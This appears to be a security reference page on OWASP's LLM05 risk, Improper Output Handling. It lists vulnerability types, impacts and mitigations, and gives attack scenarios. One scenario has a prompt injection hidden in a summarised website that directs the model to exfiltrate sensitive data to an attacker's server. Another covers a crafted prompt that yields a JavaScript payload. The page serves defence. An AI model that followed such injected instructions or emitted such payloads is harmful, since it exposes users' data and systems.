Under active development Content is continuously updated and improved

LLM05Improper Output Handling

>Control Description

Improper Output Handling refers to insufficient validation, sanitization, and handling of LLM-generated outputs before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this provides users indirect access to additional functionality, potentially resulting in XSS, CSRF, SSRF, privilege escalation, or remote code execution.

>Vulnerability Types

  • 1.Remote Code Execution: LLM output entered directly into system shell or eval functions
  • 2.Cross-Site Scripting (XSS): JavaScript or Markdown generated and interpreted by browser
  • 3.SQL Injection: LLM-generated queries executed without proper parameterization
  • 4.Path Traversal: LLM output used to construct file paths without sanitization
  • 5.Email Injection: LLM-generated content in email templates enabling phishing attacks

>Common Impacts

Remote code execution on backend systems
Cross-site scripting attacks in web browsers
SQL injection and data breaches
Privilege escalation
Server-side request forgery (SSRF)

>Prevention & Mitigation Strategies

  1. 1.Treat the model as any other user with zero-trust approach and proper input validation
  2. 2.Follow OWASP ASVS guidelines for effective input validation and sanitization
  3. 3.Encode model output to mitigate undesired code execution by JavaScript or Markdown
  4. 4.Implement context-aware output encoding based on where LLM output will be used
  5. 5.Use parameterized queries or prepared statements for all database operations
  6. 6.Employ strict Content Security Policies (CSP) to mitigate XSS risks
  7. 7.Implement robust logging and monitoring to detect unusual patterns in LLM outputs

>Attack Scenarios

#1Extension Command Injection

An application uses an LLM extension for chatbot responses. The extension also offers administrative functions. The LLM passes its response without validation, causing the extension to shut down for maintenance.

#2Data Exfiltration via Summary

A user uses a website summarizer tool. The website includes a prompt injection instructing the LLM to capture sensitive content and send it to an attacker-controlled server.

#3SQL Query Manipulation

An LLM allows users to craft SQL queries through a chat feature. A user requests a query to delete all database tables, which executes without scrutiny.

#4XSS via Generated Content

A web app uses an LLM to generate content from user prompts without sanitization. An attacker submits a crafted prompt causing the LLM to return an unsanitized JavaScript payload.

>References

Ask AI

Configure your API key to use AI features.